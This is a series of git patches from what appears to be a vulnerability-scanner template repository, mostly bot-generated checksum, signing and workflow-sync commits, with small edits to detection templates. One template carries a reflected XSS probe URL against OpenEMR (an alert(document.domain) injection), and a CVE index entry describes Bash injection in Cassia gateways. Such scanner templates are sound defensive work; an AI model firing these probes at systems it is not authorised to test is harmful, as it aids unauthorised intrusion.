http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:7f769d37fd1e99b8c707f15123f774320cc68a9c http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:293e13f7aa67bd4fab36c4174f5349acfcbc737b http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d829a9f8df913b7baf54effb4c7193d8 +http/vulnerabilities/titan/titannit-web-ssrf.yaml:d784ccfc0995869bfffbf5b3879d92b58c705ab2 http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:237187847805b1973d1d857e6d6d73a392456ad7 http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc @@ -8433,7 +8434,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:775ace501b58833b0f3cef74dc0b686ba9e6ad7a +templates-checksum.txt:12fcc7e49065cbbd526ff7a704d49052b87f0607 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fea52cab1f996954beda7a052e277c62bfbbc0d7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 13:34:13 +0000 Subject: [PATCH 0292/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 7d821d9a35..0ec5854c1b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' + - 'http/vulnerabilities/titan/titannit-web-ssrf.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From f37c5a9fe619118ffbc3d9f61b4029924af73435 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:35:32 +0000 Subject: [PATCH 0293/1768] Auto Template Signing [Tue Apr 23 13:35:32 UTC 2024] :robot: --- http/vulnerabilities/titan/titannit-web-ssrf.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/titan/titannit-web-ssrf.yaml b/http/vulnerabilities/titan/titannit-web-ssrf.yaml index ea1097a86b..987bc42cf4 100644 --- a/http/vulnerabilities/titan/titannit-web-ssrf.yaml +++ b/http/vulnerabilities/titan/titannit-web-ssrf.yaml @@ -34,3 +34,4 @@ http: part: body words: - "titan.css" +# digest: 4b0a00483046022100879d069429630f609a358e6d75ca42bc2a252e693eacd5871e1fd985f8c45a9d022100a9e019ea6c7dbc14a86cca85d5e089e3a2ef69454aedbbd719d6e15f9a5321dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 52bf9b3e318ade8a1459081e8556a40144a91a8d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:38:54 +0000 Subject: [PATCH 0294/1768] Auto Generated Templates Checksum [Tue Apr 23 13:38:54 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 199be80162..c4fb156a1f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5601,6 +5601,7 @@ http/misconfiguration/teslamate-unauth-access.yaml:446a2240cd1f6c0de4961e997f7e0 http/misconfiguration/thanos-prometheus-exposure.yaml:d238fc8c96c28626700eb47c6949a5420988bbf5 http/misconfiguration/thinkphp-errors.yaml:f3ddd674ae9e75b7760f111edf8347d3babb994e http/misconfiguration/tiny-file-manager-unauth.yaml:022c4efede57b4b63e9e54ea86fc05b756100d69 +http/misconfiguration/titannit-web-exposure.yaml:da0c21fcfee7c1b652d3dc985ea0b9323c8b671a http/misconfiguration/tls-sni-proxy.yaml:a2c22f5e9d5b37efd159f4985d09700912cc59ed http/misconfiguration/tomcat-cookie-exposed.yaml:3b3d6328a22661f3aa85b86e5c9f49c5eff9e5c6 http/misconfiguration/tomcat-scripts.yaml:140d28fb99d8811e144b9cab5bf574697bcdf4de @@ -7918,7 +7919,7 @@ http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:03c2c45139f6ccce4cae1593fa60 http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:7f769d37fd1e99b8c707f15123f774320cc68a9c http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:293e13f7aa67bd4fab36c4174f5349acfcbc737b http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d829a9f8df913b7baf54effb4c7193d8 -http/vulnerabilities/titan/titannit-web-ssrf.yaml:d784ccfc0995869bfffbf5b3879d92b58c705ab2 +http/vulnerabilities/titan/titannit-web-ssrf.yaml:2c3d9ff9f823bbe6b104a1b23105182fab34818c http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:237187847805b1973d1d857e6d6d73a392456ad7 http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc @@ -8434,7 +8435,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:12fcc7e49065cbbd526ff7a704d49052b87f0607 +templates-checksum.txt:07684d83e503cac5677d1b5e2f4641b0261ddaad wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 953d5b7c706fa4634d7852e4bb114ffab4b38780 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:40:38 +0000 Subject: [PATCH 0295/1768] Auto Template Signing [Tue Apr 23 13:40:38 UTC 2024] :robot: --- http/misconfiguration/titannit-web-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/titannit-web-exposure.yaml b/http/misconfiguration/titannit-web-exposure.yaml index 44377fb0d4..8820107c4c 100644 --- a/http/misconfiguration/titannit-web-exposure.yaml +++ b/http/misconfiguration/titannit-web-exposure.yaml @@ -27,3 +27,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450221008000902f0dd80d44d24d0aaa51dc88fb8ca6ea57bdbade552e272b651c9a0e2e02207dbc82cdb7f044cb3ec30f67daee04ba1b293f307cdf6a51b723b7d1720fed34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 002916335525f4cdc21320e85278eaaadb916869 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Apr 2024 19:13:35 +0530 Subject: [PATCH 0296/1768] Update CVE-2023-31446.yaml --- http/cves/2023/CVE-2023-31446.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index 0906f334ea..cef832814d 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -41,7 +41,6 @@ http: words: - "dns" - - type: word - part: body - words: - - "OK" + - type: regex + regex: + - "^OK$" From 0eabf76da9fb6d94a1f9aec321b6f943f42b58fa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 23 Apr 2024 19:14:37 +0530 Subject: [PATCH 0297/1768] minor update --- http/cves/2023/CVE-2023-2948.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index d37dcc4123..636411a950 100644 --- a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -21,17 +21,19 @@ info: product: openemr fofa-query: app="OpenEMR" shodan-query: http.favicon.hash:1971268439 + verified: true + max-request: 1 tags: cve,cve2023,xss,openemr,open-emr http: - method: GET path: - - "{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(1);function%20x(){if(1){a=({a:{a:1" + - "{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/html")' - - 'contains_all(body, "list_id: 1}});}}alert(1);", "select at least one Provider", "Save</span>")' + - 'contains_all(body, "list_id: 1}});}}alert(document.domain);", "select at least one Provider", "Save</span>")' condition: and From 3419ddb93dbe65cd2910d879fc375f26e8d1b65d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 13:47:36 +0000 Subject: [PATCH 0298/1768] Auto Generated New Template Addition List [Tue Apr 23 13:47:36 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index a789829497..df40e1c786 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,6 @@ +http/cves/2023/CVE-2023-31446.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/tixeo-panel.yaml +http/misconfiguration/titannit-web-exposure.yaml http/vulnerabilities/titan/titannit-web-ssrf.yaml From 47b74f6214cd1905bde6a4dcca067fbd341f08d6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:47:40 +0000 Subject: [PATCH 0299/1768] Auto Generated cves.json [Tue Apr 23 13:47:40 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index c63b47090f..1fca015f17 100644 --- a/cves.json +++ b/cves.json @@ -2125,6 +2125,7 @@ {"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"} {"ID":"CVE-2023-30943","Info":{"Name":"Moodle - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30943.yaml"} {"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"} +{"ID":"CVE-2023-31446","Info":{"Name":"Cassia Gateway Firmware - Remote Code Execution","Severity":"critical","Description":"In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31446.yaml"} {"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"} {"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"} {"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 012729e272..7877c96f35 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -29da5f9ef55e70d230c4528d89e55661 +c289499c72b1f8a29d351d81adb20aec From 8cd5b5f2d24557c4c7ba88b169fffd4ad9e0e296 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Apr 2024 19:18:23 +0530 Subject: [PATCH 0300/1768] updated metadata & name --- http/exposed-panels/cassia-bluetooth-gateway-panel.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml index 8cd893c055..aa5e3d3e08 100644 --- a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml +++ b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml @@ -1,13 +1,17 @@ id: cassia-bluetooth-gateway-panel info: - name: Cassia Bluetooth Gateway - Panel + name: Cassia Bluetooth Gateway Panel - Detect author: DhiyaneshDk severity: info description: | Cassia Bluetooth Gateway Management Platform login page was discovered. reference: - https://www.cassianetworks.com/products/x1000-outdoor-bluetooth-router/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Cassia Bluetooth Gateway Management Platform" tags: cassia,gateway,login,panel requests: From 59ead9661d84a0a4e6bb5889c53d6a31d05a22fe Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 13:48:28 +0000 Subject: [PATCH 0301/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0ec5854c1b..f33f31dde4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,9 +3,11 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' + - 'http/misconfiguration/titannit-web-exposure.yaml' - 'http/vulnerabilities/titan/titannit-web-ssrf.yaml' workflow_dispatch: jobs: From 1a5c43429ef46654a9ea4c88e7b232795971cdbb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:49:26 +0000 Subject: [PATCH 0302/1768] Auto Template Signing [Tue Apr 23 13:49:26 UTC 2024] :robot: --- http/cves/2023/CVE-2023-31446.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index cef832814d..5511a3bccd 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -44,3 +44,4 @@ http: - type: regex regex: - "^OK$" +# digest: 4a0a00473045022100a8303b0cd10a64a26c1017b52482339440bbe857e22361f8d58e29bed65bc03302205340556a2173736013f81b1ad2bfa44459a577ac9e4ee71bbf10a5f1917725bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 291ec6895d4124b932497fbcaefde68f8403f08f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 23 Apr 2024 19:19:35 +0530 Subject: [PATCH 0303/1768] minor update --- http/cves/2023/CVE-2023-2949.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index 850c8f6dc9..5a0abfcbd5 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -21,6 +21,8 @@ info: product: openemr fofa-query: app="OpenEMR" shodan-query: http.favicon.hash:1971268439 + verified: true + max-request: 1 tags: cve,cve2023,xss,openemr,open-emr http: From 2a115bd24be9fa3656c339c284f98c54b1a3ebf0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 13:51:50 +0000 Subject: [PATCH 0304/1768] Auto Generated New Template Addition List [Tue Apr 23 13:51:50 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index df40e1c786..ae26c2e7c7 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2023/CVE-2023-31446.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml +http/exposed-panels/cassia-bluetooth-gateway-panel.yaml http/exposed-panels/tixeo-panel.yaml http/misconfiguration/titannit-web-exposure.yaml http/vulnerabilities/titan/titannit-web-ssrf.yaml From ac7178446958b08ce3472b9d68cdcb106236d988 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Apr 2024 19:22:01 +0530 Subject: [PATCH 0305/1768] updated info --- http/exposed-panels/femtocell-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/femtocell-panel.yaml b/http/exposed-panels/femtocell-panel.yaml index 53a98ced85..13fae89e3e 100644 --- a/http/exposed-panels/femtocell-panel.yaml +++ b/http/exposed-panels/femtocell-panel.yaml @@ -1,7 +1,7 @@ id: femtocell-panel info: - name: Femtocell Access Point - Panel + name: Femtocell Access Point Panel - Detect author: DhiyaneshDk severity: info description: | From 03162ec2101e198a3c29354269fdb2b9f49a08eb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:52:03 +0000 Subject: [PATCH 0306/1768] Auto Generated Templates Checksum [Tue Apr 23 13:52:03 UTC 2024] :robot: --- templates-checksum.txt | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c4fb156a1f..cf950f2fde 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:8a44c1296b71808e710045fd07fa4005d0fac430 -cves.json-checksum.txt:a36388135d392add835581b30f1d85ad2546d052 +cves.json:36f00087c499db934d2d7817000d577a042fef18 +cves.json-checksum.txt:ea54c3128a95b8556ca5f197b1230b7961721467 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3019,6 +3019,7 @@ http/cves/2023/CVE-2023-30777.yaml:84e1a81ce9f0ad56c8dc4249cab724697ea91a80 http/cves/2023/CVE-2023-30868.yaml:0d890bae91b41fa1b84588722fb8d9e6aa45b3c8 http/cves/2023/CVE-2023-30943.yaml:0d69bdceb77a742047c6c51eb8990082f537a68c http/cves/2023/CVE-2023-31059.yaml:2f55ef6a46f15bb784839290fdc7a1a536472c36 +http/cves/2023/CVE-2023-31446.yaml:0ba3222752c4cc2de6941cdce24a66042f78e1c3 http/cves/2023/CVE-2023-31465.yaml:6bd33dcdf6008201a427dc26394290cd8a743bee http/cves/2023/CVE-2023-31548.yaml:2c5cbc65c0eccc342f8a64e1446f235eb72859a9 http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b @@ -3583,6 +3584,7 @@ http/exposed-panels/cas-login.yaml:5306b5f25ec74fe5de0dfaeb4553db4cf0573e71 http/exposed-panels/casaos-panel.yaml:b5b35a1e107699546e8e9f9e743458550dcf48f2 http/exposed-panels/casdoor-login.yaml:fad04f2809901a34b0e399199f2435442f1084c5 http/exposed-panels/casemanager-panel.yaml:d3f500a3a04229668da9d25eff8008549cef7184 +http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:86d04ae96e93ebd38b0c1e5be6c80698a8e1244c http/exposed-panels/caton-network-manager-system.yaml:a090f70d917315acdb3413100357b0d3c0d218d8 http/exposed-panels/ccm-detect.yaml:c516a91f314390b740ba2d8ea6c94057b54aec56 http/exposed-panels/centreon-panel.yaml:b04f3b6e8b7ed6fab27a4a623a6616b90d950023 @@ -5601,7 +5603,7 @@ http/misconfiguration/teslamate-unauth-access.yaml:446a2240cd1f6c0de4961e997f7e0 http/misconfiguration/thanos-prometheus-exposure.yaml:d238fc8c96c28626700eb47c6949a5420988bbf5 http/misconfiguration/thinkphp-errors.yaml:f3ddd674ae9e75b7760f111edf8347d3babb994e http/misconfiguration/tiny-file-manager-unauth.yaml:022c4efede57b4b63e9e54ea86fc05b756100d69 -http/misconfiguration/titannit-web-exposure.yaml:da0c21fcfee7c1b652d3dc985ea0b9323c8b671a +http/misconfiguration/titannit-web-exposure.yaml:7a171e9165d8f1a7467e018c320247c2eba80b9c http/misconfiguration/tls-sni-proxy.yaml:a2c22f5e9d5b37efd159f4985d09700912cc59ed http/misconfiguration/tomcat-cookie-exposed.yaml:3b3d6328a22661f3aa85b86e5c9f49c5eff9e5c6 http/misconfiguration/tomcat-scripts.yaml:140d28fb99d8811e144b9cab5bf574697bcdf4de @@ -8435,7 +8437,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:07684d83e503cac5677d1b5e2f4641b0261ddaad +templates-checksum.txt:2a4c1827fbe6b47750608b75cab33ea0d9a4bd10 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 349a5579e5b8df7049c721505b671d6b4b547736 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 13:52:38 +0000 Subject: [PATCH 0307/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f33f31dde4..8a796656d7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' + - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' - 'http/vulnerabilities/titan/titannit-web-ssrf.yaml' From 81a95fa9df305ed934ac267fdf2aa55c3fd92e3b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:53:37 +0000 Subject: [PATCH 0308/1768] Auto Template Signing [Tue Apr 23 13:53:37 UTC 2024] :robot: --- http/exposed-panels/cassia-bluetooth-gateway-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml index aa5e3d3e08..2ff8cdd3ef 100644 --- a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml +++ b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml @@ -29,3 +29,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100baabf488454e8584e30f25c730d6c8205a81001f9ce8402e9a0030146d3c7717022100dfdcbb0e792557b52b82af06286c1d278b9992528c519460c660113c0a6fa643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e7f6df8d64a42f2144bb61309526587e47553ec0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 13:55:06 +0000 Subject: [PATCH 0309/1768] Auto Generated New Template Addition List [Tue Apr 23 13:55:06 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ae26c2e7c7..6696b1282e 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-31446.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/cassia-bluetooth-gateway-panel.yaml +http/exposed-panels/femtocell-panel.yaml http/exposed-panels/tixeo-panel.yaml http/misconfiguration/titannit-web-exposure.yaml http/vulnerabilities/titan/titannit-web-ssrf.yaml From b11716f1bb1e98fa3d1fca2ffd03884fcda085dd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:55:18 +0000 Subject: [PATCH 0310/1768] Auto Generated Templates Checksum [Tue Apr 23 13:55:18 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index cf950f2fde..8b43e5ad64 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3584,7 +3584,7 @@ http/exposed-panels/cas-login.yaml:5306b5f25ec74fe5de0dfaeb4553db4cf0573e71 http/exposed-panels/casaos-panel.yaml:b5b35a1e107699546e8e9f9e743458550dcf48f2 http/exposed-panels/casdoor-login.yaml:fad04f2809901a34b0e399199f2435442f1084c5 http/exposed-panels/casemanager-panel.yaml:d3f500a3a04229668da9d25eff8008549cef7184 -http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:86d04ae96e93ebd38b0c1e5be6c80698a8e1244c +http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:1decbcfd31237f785c6a156d79e8db4a25cb2d14 http/exposed-panels/caton-network-manager-system.yaml:a090f70d917315acdb3413100357b0d3c0d218d8 http/exposed-panels/ccm-detect.yaml:c516a91f314390b740ba2d8ea6c94057b54aec56 http/exposed-panels/centreon-panel.yaml:b04f3b6e8b7ed6fab27a4a623a6616b90d950023 @@ -3746,6 +3746,7 @@ http/exposed-panels/fastpanel-hosting-control-panel.yaml:c53b1d9ac66491f5b7e535f http/exposed-panels/fatpipe-ipvpn-panel.yaml:96d8b28698b2fb761fc63eb8c962983740911722 http/exposed-panels/fatpipe-mpvpn-panel.yaml:6cab1c3b59ad31436a7de8f8303cc327b2471d3b http/exposed-panels/fatpipe-warp-panel.yaml:657b1162cb1f511f08b091843db0b3ef3332ad59 +http/exposed-panels/femtocell-panel.yaml:33760c0a350f45ba7bcef2dd9879df10a8c8a821 http/exposed-panels/filebrowser-login-panel.yaml:693739adaae9ae64099d57ea5ac8960181670338 http/exposed-panels/fiori-launchpad.yaml:6350276e5ddc465db38147e5b0543161cc5d3afc http/exposed-panels/fiorilaunchpad-logon.yaml:789b18f0d60dbe8f6b3355aa9eaa79e7e2adbd66 @@ -8437,7 +8438,7 @@ 